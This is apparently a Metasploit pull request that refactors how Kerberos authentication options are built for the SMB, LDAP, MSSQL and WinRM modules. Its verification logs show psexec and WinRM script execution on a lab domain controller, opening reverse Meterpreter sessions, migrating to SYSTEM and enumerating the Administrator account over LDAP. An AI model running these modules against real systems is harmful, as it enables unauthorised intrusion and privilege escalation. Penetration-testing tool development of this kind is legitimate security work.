### PR TITLE
Use shared helper for creating kerberos options

### DIFF
--- a/docs/metasploit-framework.wiki/kerberos/service_authentication.md
+++ b/docs/metasploit-framework.wiki/kerberos/service_authentication.md
@@ -130,6 +130,7 @@ Optional options:
     * `read-only` -- Stored tickets from the cache will be used, but no new tickets are stored.
     * `write-only` -- New tickets are requested and they are stored for reuse.
     * `read-write` -- Stored tickets from the cache will be used and new tickets will be stored for reuse.
+* `${Prefix}KrbOfferedEncryptionTypes' -- The list of encryption types presented to the KDC as being supported by the Metasploit client. i.e. `SmbKrbOfferedEncryptionTypes=AES256`
 
 ## Ticket management
 

--- a/lib/msf/core/exploit/remote/auth_option.rb
+++ b/lib/msf/core/exploit/remote/auth_option.rb
@@ -71,14 +71,4 @@ module Msf::Exploit::Remote::AuthOption
       Rex::Proto::Kerberos::Crypto::Encryption.value_for(type.upcase.gsub('-', '_'))
     end.uniq
   end
-
-  etype_regex = "(#{Msf::Exploit::Remote::AuthOption::KERBEROS_DEFAULT_OFFERED_ENC_TYPES.map { |v| Regexp.escape(v) }.join('|')})"
-  OPT_KRB_OFFERED_ENC_TYPES = Msf::OptString.new(
-    'KrbOfferedEncryptionTypes', [
-      true,
-      'Kerberos encryption types to offer',
-      Msf::Exploit::Remote::AuthOption::KERBEROS_DEFAULT_OFFERED_ENC_TYPES.join(',')
-    ],
-    regex: Regexp.new("(#{etype_regex},)*#{etype_regex}", options: Regexp::IGNORECASE)
-  )
 end

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator.rb
@@ -1,0 +1,7 @@
+# -*- coding: binary -*-
+
+#
+# The module used for remote Kerberos authentication
+#
+class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator
+end

--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/options.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/options.rb
@@ -1,0 +1,50 @@
+# -*- coding: binary -*-
+
+#
+# This class stores Metasploit option configuration used across service authentication
+#
+module Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options
+  # Create the list of options that a module must provide for Kerberos authethentication via the given protocol
+  # This method exists for ensuring consistency across service authentication modules
+  #
+  # @param [String] protocol The service protocol type, i.e. smb/ldap/winrm/mssql
+  # @param [Array<String>] auth_methods The allowed auth methods
+  # @see Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options::Msf::Exploit::Remote::AuthOption
+  def kerberos_auth_options(protocol:, auth_methods:)
+    etype_regex = "(#{Msf::Exploit::Remote::AuthOption::KERBEROS_DEFAULT_OFFERED_ENC_TYPES.map { |v| Regexp.escape(v) }.join('|')})"
+    offered_enc_types_option = Msf::OptString.new(
+      "#{protocol}KrbOfferedEncryptionTypes",
+      [
+        true,
+        'Kerberos encryption types to offer',
+        Msf::Exploit::Remote::AuthOption::KERBEROS_DEFAULT_OFFERED_ENC_TYPES.join(',')
+      ],
+      regex: Regexp.new("(#{etype_regex},)*#{etype_regex}", options: Regexp::IGNORECASE)
+    )
+
+    auth_options = [
+      Msf::OptEnum.new(
+        "#{protocol}Auth",
+        [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::AUTO, auth_methods],
+      ),
+      Msf::OptString.new(
+        "#{protocol}Rhostname",
+        [false, 'The rhostname which is required for kerberos - the SPN'],
+        fallbacks: ['Rhostname'],
+      ),
+      Msf::OptAddress.new(
+        'DomainControllerRhost',
+        [false, 'The resolvable rhost for the Domain Controller'],
+      ),
+      Msf::OptPath.new(
+        "#{protocol}Krb5Ccname",
+        [false, 'The ccache file to use for kerberos authentication', ENV.fetch('SMBKRB5CCNAME', ENV.fetch('KRB5CCNAME', nil))],
+      )
+    ]
+
+    [
+      *auth_options,
+      offered_enc_types_option
+    ]
+  end
+end

--- a/lib/msf/core/exploit/remote/kerberos/ticket/storage.rb
+++ b/lib/msf/core/exploit/remote/kerberos/ticket/storage.rb
@@ -13,18 +13,22 @@ module Msf::Exploit::Remote::Kerberos::Ticket
 
     def initialize(info = {})
       super
-      register_advanced_options(
-        [
-          Msf::OptEnum.new(
-            'KrbCacheMode', [
-              true,
-              'Kerberos ticket cache storage mode',
-              'read-write',
-              %w[ none read-only write-only read-write ]
-            ]
-          )
-        ]
-      )
+    end
+
+    # @param [String,nil] protocol The service protocol type, i.e. smb/ldap/winrm/mssql
+    # @return [Array<Msf::OptEnum>]
+    def kerberos_storage_options(protocol: nil)
+      [
+        Msf::OptEnum.new(
+          'KrbCacheMode',
+          [
+            true,
+            'Kerberos ticket cache storage mode',
+            'read-write',
+            %w[ none read-only write-only read-write ]
+          ]
+        )
+      ]
     end
 
     # Build a ticket storage object based on either the specified options or the datastore if no options are defined.

--- a/lib/msf/core/exploit/remote/ldap.rb
+++ b/lib/msf/core/exploit/remote/ldap.rb
@@ -9,6 +9,7 @@ require 'rex/proto/ldap'
 module Msf
   module Exploit::Remote::LDAP
     include Msf::Exploit::Remote::Kerberos::Ticket::Storage
+    include Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options
 
     # Initialize the LDAP client and set up the LDAP specific datastore
     # options to allow the client to perform authentication and timeout
@@ -32,14 +33,13 @@ module Msf
         Msf::OptString.new('PASSWORD', [false, 'The password to authenticate with'], aliases: ['BIND_PW']),
       ])
 
-      register_advanced_options([
-        OptEnum.new('LDAPAuth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::AUTO, Msf::Exploit::Remote::AuthOption::LDAP_OPTIONS]),
-        OptString.new('LdapRhostname', [false, 'The rhostname which is required for kerberos']),
-        OptPath.new('LdapKrb5Ccname', [false, 'The ccache file to use for kerberos authentication', ENV.fetch('LDAPKRB5CCNAME', ENV.fetch('KRB5CCNAME', nil))], conditions: %w[ LDAPAuth == kerberos ]),
-        OptAddress.new('DomainControllerRhost', [false, 'The resolvable rhost for the Domain Controller']),
-        Msf::Exploit::Remote::AuthOption::OPT_KRB_OFFERED_ENC_TYPES,
-        OptFloat.new('LDAP::ConnectTimeout', [true, 'Timeout for LDAP connect', 10.0])
-      ])
+      register_advanced_options(
+        [
+          *kerberos_storage_options(protocol: 'LDAP'),
+          *kerberos_auth_options(protocol: 'LDAP', auth_methods: Msf::Exploit::Remote::AuthOption::LDAP_OPTIONS),
+          OptFloat.new('LDAP::ConnectTimeout', [true, 'Timeout for LDAP connect', 10.0])
+        ]
+      )
     end
 
     # Alias to return the RHOST datastore option.
@@ -90,7 +90,7 @@ module Msf
         fail_with(Msf::Exploit::Failure::BadConfig, 'The LdapRhostname option is required when using Kerberos authentication.') if datastore['LdapRhostname'].blank?
         fail_with(Msf::Exploit::Failure::BadConfig, 'The DOMAIN option is required when using Kerberos authentication.') if datastore['DOMAIN'].blank?
         fail_with(Msf::Exploit::Failure::BadConfig, 'The DomainControllerRhost is required when using Kerberos authentication.') if datastore['DomainControllerRhost'].blank?
-        offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['KrbOfferedEncryptionTypes'])
+        offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['LdapKrbOfferedEncryptionTypes'])
         fail_with(Msf::Exploit::Failure::BadConfig, 'At least one encryption type is required when using Kerberos authentication.') if offered_etypes.empty?
 
         kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::LDAP.new(

--- a/lib/msf/core/exploit/remote/mssql.rb
+++ b/lib/msf/core/exploit/remote/mssql.rb
@@ -16,7 +16,8 @@ module Exploit::Remote::MSSQL
   include Exploit::Remote::Tcp
   include Exploit::Remote::NTLM::Client
   include Metasploit::Framework::MSSQL::Base
-  include Exploit::Remote::Kerberos::Ticket::Storage
+  include Msf::Exploit::Remote::Kerberos::Ticket::Storage
+  include Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options
 
   #
   # Creates an instance of a MSSQL exploit module.
@@ -40,11 +41,8 @@ module Exploit::Remote::MSSQL
           File.join(Msf::Config.data_directory, "exploits", "mssql", "h2b")
         ]),
         OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', 'WORKSTATION'], aliases: ['MssqlDomain']),
-        OptEnum.new('MssqlAuth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::AUTO, Msf::Exploit::Remote::AuthOption::MSSQL_OPTIONS]),
-        OptString.new('MssqlRhostname', [false, 'The mssql hostname, required for kerberos']),
-        OptPath.new('MssqlKrb5Ccname', [false, 'The ccache file to use for kerberos authentication', ENV.fetch('MSSQLKRB5CCNAME', ENV.fetch('KRB5CCNAME', nil))], conditions: %w[ MssqlAuth == kerberos ]),
-        OptAddress.new('DomainControllerRhost', [false, 'The resolvable rhost for the Domain Controller']),
-        Msf::Exploit::Remote::AuthOption::OPT_KRB_OFFERED_ENC_TYPES
+        *kerberos_storage_options(protocol: 'Mssql'),
+        *kerberos_auth_options(protocol: 'Mssql', auth_methods: Msf::Exploit::Remote::AuthOption::MSSQL_OPTIONS),
       ], Msf::Exploit::Remote::MSSQL)
     register_autofilter_ports([ 1433, 1434, 1435, 14330, 2533, 9152, 2638 ])
     register_autofilter_services(%W{ ms-sql-s ms-sql2000 sybase })
@@ -350,7 +348,7 @@ module Exploit::Remote::MSSQL
       fail_with(Msf::Exploit::Failure::BadConfig, 'The MssqlRhostname option is required when using Kerberos authentication.') if datastore['MssqlRhostname'].blank?
       fail_with(Msf::Exploit::Failure::BadConfig, 'The DOMAIN option is required when using Kerberos authentication.') if datastore['DOMAIN'].blank?
       fail_with(Msf::Exploit::Failure::BadConfig, 'The DomainControllerRhost is required when using Kerberos authentication.') if datastore['DomainControllerRhost'].blank?
-      offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['KrbOfferedEncryptionTypes'])
+      offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['MssqlKrbOfferedEncryptionTypes'])
       fail_with(Msf::Exploit::Failure::BadConfig, 'At least one encryption type is required when using Kerberos authentication.') if offered_etypes.empty?
 
       kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::MSSQL.new(

--- a/lib/msf/core/exploit/remote/smb/client.rb
+++ b/lib/msf/core/exploit/remote/smb/client.rb
@@ -154,7 +154,7 @@ module Msf
           fail_with(Msf::Exploit::Failure::BadConfig, 'The SmbRhostname option is required when using Kerberos authentication.') if datastore['SmbRhostname'].blank?
           fail_with(Msf::Exploit::Failure::BadConfig, 'The SMBDomain option is required when using Kerberos authentication.') if datastore['SMBDomain'].blank?
           fail_with(Msf::Exploit::Failure::BadConfig, 'The DomainControllerRhost is required when using Kerberos authentication.') if datastore['DomainControllerRhost'].blank?
-          offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['KrbOfferedEncryptionTypes'])
+          offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['SmbKrbOfferedEncryptionTypes'])
           fail_with(Msf::Exploit::Failure::BadConfig, 'At least one encryption type is required when using Kerberos authentication.') if offered_etypes.empty?
 
           kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::SMB.new(

--- a/lib/msf/core/exploit/remote/smb/client/authenticated.rb
+++ b/lib/msf/core/exploit/remote/smb/client/authenticated.rb
@@ -8,6 +8,7 @@ module Exploit::Remote::SMB::Client::Authenticated
 
   include Msf::Exploit::Remote::SMB::Client
   include Msf::Exploit::Remote::Kerberos::Ticket::Storage
+  include Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options
 
   def initialize(info = {})
     super
@@ -20,11 +21,8 @@ module Exploit::Remote::SMB::Client::Authenticated
 
     register_advanced_options(
       [
-        OptEnum.new('SMBAuth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::AUTO, Msf::Exploit::Remote::AuthOption::SMB_OPTIONS]),
-        OptString.new('SmbRhostname', [false, 'The rhostname which is required for kerberos']),
-        OptAddress.new('DomainControllerRhost', [false, 'The resolvable rhost for the Domain Controller']),
-        OptPath.new('SmbKrb5Ccname', [false, 'The ccache file to use for kerberos authentication', ENV.fetch('SMBKRB5CCNAME', ENV.fetch('KRB5CCNAME', nil))], conditions: %w[ SMBAuth == kerberos ]),
-        Msf::Exploit::Remote::AuthOption::OPT_KRB_OFFERED_ENC_TYPES
+        *kerberos_storage_options(protocol: 'SMB'),
+        *kerberos_auth_options(protocol: 'SMB', auth_methods: Msf::Exploit::Remote::AuthOption::SMB_OPTIONS),
       ],
       Msf::Exploit::Remote::SMB::Client::Authenticated
     )

--- a/lib/msf/core/exploit/remote/winrm.rb
+++ b/lib/msf/core/exploit/remote/winrm.rb
@@ -7,7 +7,9 @@ module Msf
 module Exploit::Remote::WinRM
   include Exploit::Remote::NTLM::Client
   include Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::AuthOption
+  include Msf::Exploit::Remote::Kerberos::Ticket::Storage
+  include Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options
+
   #
   # Constants
   #
@@ -30,12 +32,9 @@ module Exploit::Remote::WinRM
 
     register_advanced_options(
       [
-        OptEnum.new('WinrmAuth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::AUTO, Msf::Exploit::Remote::AuthOption::WINRM_OPTIONS]),
-        OptString.new('WinrmRhostname', [false, 'The rhostname which is required for kerberos']),
-        OptAddress.new('DomainControllerRhost', [false, 'The resolvable rhost for the Domain Controller']),
-        OptPath.new('WinrmKrb5Ccname', [false, 'The ccache file to use for kerberos authentication', ENV.fetch('WINRMKRB5CCNAME', ENV.fetch('KRB5CCNAME', nil))], conditions: %w[WinrmAuth == kerberos]),
-        Msf::Exploit::Remote::AuthOption::OPT_KRB_OFFERED_ENC_TYPES
-      ]
+        *kerberos_storage_options(protocol: 'Winrm'),
+        *kerberos_auth_options(protocol: 'Winrm', auth_methods: Msf::Exploit::Remote::AuthOption::WINRM_OPTIONS),
+      ],
     )
 
     register_autofilter_ports([ 80,443,5985,5986 ])
@@ -43,11 +42,11 @@ module Exploit::Remote::WinRM
   end
 
   def check_winrm_parameters
-    if datastore['WinrmAuth'] == KERBEROS
+    if datastore['WinrmAuth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
       fail_with(Msf::Exploit::Failure::BadConfig, 'The WinrmRhostname option is required when using Kerberos authentication.') if datastore['WinrmRhostname'].blank?
       fail_with(Msf::Exploit::Failure::BadConfig, 'The DOMAIN option is required when using Kerberos authentication.') if datastore['DOMAIN'].blank?
       fail_with(Msf::Exploit::Failure::BadConfig, 'The DomainControllerRhost is required when using Kerberos authentication.') if datastore['DomainControllerRhost'].blank?
-      offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['KrbOfferedEncryptionTypes'])
+      offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['WinrmKrbOfferedEncryptionTypes'])
       fail_with(Msf::Exploit::Failure::BadConfig, 'At least one encryption type is required when using Kerberos authentication.') if offered_etypes.empty?
     else
       fail_with(Msf::Exploit::Failure::BadConfig, 'The PASSWORD option is required unless using Kerberos authentication.') if datastore['PASSWORD'].blank?
@@ -78,7 +77,7 @@ module Exploit::Remote::WinRM
       realm: datastore['DOMAIN']
     }
     case datastore['WinrmAuth']
-    when KERBEROS
+    when Msf::Exploit::Remote::AuthOption::KERBEROS
       kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::HTTP.new(
         host: datastore['DomainControllerRhost'],
         hostname: datastore['WinrmRhostname'],
@@ -89,7 +88,7 @@ module Exploit::Remote::WinRM
         framework: framework,
         framework_module: self,
         cache_file: datastore['WinrmKrb5Ccname'].blank? ? nil : datastore['WinrmKrb5Ccname'],
-        offered_etypes: Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['KrbOfferedEncryptionTypes']),
+        offered_etypes: Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['WinrmKrbOfferedEncryptionTypes']),
         mutual_auth: true,
         use_gss_checksum: true
       )

--- a/modules/auxiliary/scanner/smb/smb_login.rb
+++ b/modules/auxiliary/scanner/smb/smb_login.rb
@@ -10,7 +10,6 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::DCERPC
   include Msf::Exploit::Remote::SMB::Client
   include Msf::Exploit::Remote::SMB::Client::Authenticated
-  include Msf::Exploit::Remote::AuthOption
 
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
@@ -72,7 +71,7 @@ class MetasploitModule < Msf::Auxiliary
     domain = datastore['SMBDomain'] || ''
 
     kerberos_authenticator_factory = nil
-    if datastore['SMBAuth'] == KERBEROS
+    if datastore['SMBAuth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
       fail_with(Msf::Exploit::Failure::BadConfig, 'The SmbRhostname option is required when using Kerberos authentication.') if datastore['SmbRhostname'].blank?
       fail_with(Msf::Exploit::Failure::BadConfig, 'The SMBDomain option is required when using Kerberos authentication.') if datastore['SMBDomain'].blank?
       fail_with(Msf::Exploit::Failure::BadConfig, 'The DomainControllerRhost is required when using Kerberos authentication.') if datastore['DomainControllerRhost'].blank?

--- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb
@@ -9,8 +9,6 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::WinRM
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
-  include Msf::Exploit::Remote::AuthOption
-  include Msf::Exploit::Remote::Kerberos::Ticket::Storage
 
   def initialize
     super(
@@ -56,7 +54,7 @@ class MetasploitModule < Msf::Auxiliary
         realm: datastore['DOMAIN']
     }
     case datastore['WinrmAuth']
-    when KERBEROS
+    when Msf::Exploit::Remote::AuthOption::KERBEROS
       kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::HTTP.new(
         host: datastore['DomainControllerRhost'],
         hostname: datastore['WinrmRhostname'],
@@ -70,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary
         mutual_auth: true,
         use_gss_checksum: true,
         ticket_storage: kerberos_ticket_storage,
-        offered_etypes: Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['KrbOfferedEncryptionTypes'])
+        offered_etypes: Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['WinrmKrbOfferedEncryptionTypes'])
       )
       opts = opts.merge({
         user: '', # Need to provide it, otherwise the WinRM module complains

--- a/modules/auxiliary/scanner/winrm/winrm_login.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_login.rb
@@ -14,7 +14,6 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::AuthBrute
   include Msf::Auxiliary::CommandShell
   include Msf::Auxiliary::Scanner
-  include Msf::Exploit::Remote::AuthOption
   include Msf::Exploit::Remote::Kerberos::Ticket::Storage
 
   def initialize
@@ -50,7 +49,7 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     kerberos_authenticator_factory = nil
-    if datastore['WinrmAuth'] == KERBEROS
+    if datastore['WinrmAuth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
       kerberos_authenticator_factory = -> (username, password, realm) do
         Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::HTTP.new(
           host: datastore['DomainControllerRhost'],
@@ -65,7 +64,7 @@ class MetasploitModule < Msf::Auxiliary
           mutual_auth: true,
           use_gss_checksum: true,
           ticket_storage: kerberos_ticket_storage,
-          offered_etypes: Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['KrbOfferedEncryptionTypes'])
+          offered_etypes: Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['WinrmKrbOfferedEncryptionTypes'])
         )
       end
     end


### PR DESCRIPTION
Introduces shared helpers for creating Kerberos options which ensures the consistency of naming option name conventions across protocols.

### Verification Steps

I verified that the options still appeared to the user; and that the modules worked

Open a WinRM session:

```
msf6 auxiliary(scanner/winrm/winrm_login) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrmauth=kerberos domaincontrollerrhost=192.168.123.13 winrmrhostname=dc3.adf3.local domain=adf3.local

[+] 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:5985   - TGT MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230120120424_default_192.168.123.13_mit.kerberos.cca_806031.bin
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:5985   - TGS MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230120120424_default_192.168.123.13_mit.kerberos.cca_914863.bin
[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
[+] 192.168.123.13:88 - Received AP-REQ. Extracting session key...
[!] No active DB -- Credential data will not be saved!
[+] 192.168.123.13:5985 - Login Successful: adf3.local\Administrator:p4$$w0rd
[*] Command shell session 2 opened (192.168.123.1:50667 -> 192.168.123.13:5985) at 2023-01-20 12:04:24 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

winrm_script_exec:

```
msf6 exploit(windows/winrm/winrm_script_exec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrmauth=kerberos domaincontrollerrhost=192.168.123.13 winrmrhostname=dc3.adf3.local domain=adf3.local

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Checking for Powershell 2.0
[+] 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:5985 - TGT MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230120120654_default_192.168.123.13_mit.kerberos.cca_803558.bin
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:5985 - TGS MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230120120654_default_192.168.123.13_mit.kerberos.cca_694266.bin
[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
[+] 192.168.123.13:88 - Received AP-REQ. Extracting session key...
[-] You selected an x86 payload for an x64 target...trying to run in compat mode
[*] Grabbing %TEMP%
[*] Uploading powershell script to C:\Users\ADMINI~1\AppData\Local\Temp\ZxpfFVPL.ps1 (This may take a few minutes)...
[*] Attempting to execute script...
[*] Sending stage (175686 bytes) to 192.168.123.13
[*] Session ID 4 (192.168.123.1:4444 -> 192.168.123.13:63097) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is powershell.exe (4440) as: ADF3\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[-] Could not migrate to services.exe.
[-] Could not migrate to wininit.exe.
[*] Trying svchost.exe (860)
[+] Successfully migrated to svchost.exe (860) as: NT AUTHORITY\SYSTEM
[*] Meterpreter session 4 opened (192.168.123.1:4444 -> 192.168.123.13:63097) at 2023-01-20 12:07:04 +0000

meterpreter > 
```

ldap:

```
msf6 auxiliary(gather/ldap_query) > run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldapauth=kerberos ldaprhostname=dc3.adf3.local domain=adf3.local domaincontrollerrhost=192.168.123.13
[*] Running module against 192.168.123.13

[+] 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230120120334_default_192.168.123.13_mit.kerberos.cca_771109.bin
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230120120334_default_192.168.123.13_mit.kerberos.cca_073054.bin
[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
[*] Discovering base DN automatically
[+] 192.168.123.13:389 Discovered base DN: DC=adf3,DC=local
CN=Administrator CN=Users DC=adf3 DC=local
==========================================

 Name                Attributes
 ----                ----------
 badpwdcount         0
 description         Built-in account for administering the computer/domain
 lastlogoff          1601-01-01 00:00:00 UTC
 lastlogon           2023-01-20 12:03:34 UTC
 logoncount          196
 memberof            CN=Group Policy Creator Owners,CN=Users,DC=adf3,DC=local || CN=Domain Admins,CN=Users,DC=adf3,DC=local || CN=Enterprise Admins,CN=Users,DC=adf3,DC=local || CN=Schema Admins,CN=Users,DC=adf3,DC=local || CN=Administrators,CN=Builtin,
                     DC=adf3,DC=local
 name                Administrator
 pwdlastset          133184302034979121
 samaccountname      Administrator
 useraccountcontrol  512

...


msf6 auxiliary(gather/ldap_query) > show advanced

Module advanced options (auxiliary/gather/ldap_query):

   Name                           Current Setting                                   Required  Description
   ----                           ---------------                                   --------  -----------
   DomainControllerRhost                                                            no        The resolvable rhost for the Domain Controller
   KrbCacheMode                   read-write                                        yes       Kerberos ticket cache storage mode (Accepted: none, read-only, write-only, read-write)
   LDAP::ConnectTimeout           10.0                                              yes       Timeout for LDAP connect
   LDAPAuth                       auto                                              yes       The Authentication mechanism to use (Accepted: auto, ntlm, kerberos, plaintext, none)
   LDAPKrb5Ccname                                                                   no        The ccache file to use for kerberos authentication
   LDAPKrbOfferedEncryptionTypes  AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1  yes       Kerberos encryption types to offer
   LDAPRhostname                                                                    no        The rhostname which is required for kerberos - the SPN
```


Running psexec against a host:

```
msf6 exploit(windows/smb/psexec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smbauth=kerberos domaincontrollerrhost=192.168.123.13 smbrhostname=dc3.adf3.local domain=adf3.local

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|adf3.local as user 'Administrator'...
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230120120457_default_192.168.123.13_mit.kerberos.cca_440371.bin
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230120120457_default_192.168.123.13_mit.kerberos.cca_040901.bin
[+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response
[*] 192.168.123.13:445 - Selecting PowerShell target
[*] 192.168.123.13:445 - Executing the payload...
[+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.123.13
[*] Meterpreter session 3 opened (192.168.123.1:4444 -> 192.168.123.13:63094) at 2023-01-20 12:04:59 +0000

meterpreter > 


msf6 exploit(windows/smb/psexec) > show advanced

Module advanced options (exploit/windows/smb/psexec):

   Name                                    Current Setting                                         Required  Description
   ----                                    ---------------                                         --------  -----------
...
   KrbCacheMode                            read-write                                              yes       Kerberos ticket cache storage mode (Accepted: none, read-only, write-only, read-write)
   SMBDirect                               true                                                    no        The target port is a raw SMB service (not NetBIOS)
   SMBKrb5Ccname                                                                                   no        The ccache file to use for kerberos authentication
   SMBKrbOfferedEncryptionTypes            AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1        yes       Kerberos encryption types to offer
   SMBName                                 *SMBSERVER                                              yes       The NetBIOS hostname (required for port 139 connections)
   SMBRhostname                                                                                    no        The rhostname which is required for kerberos - the SPN
...
```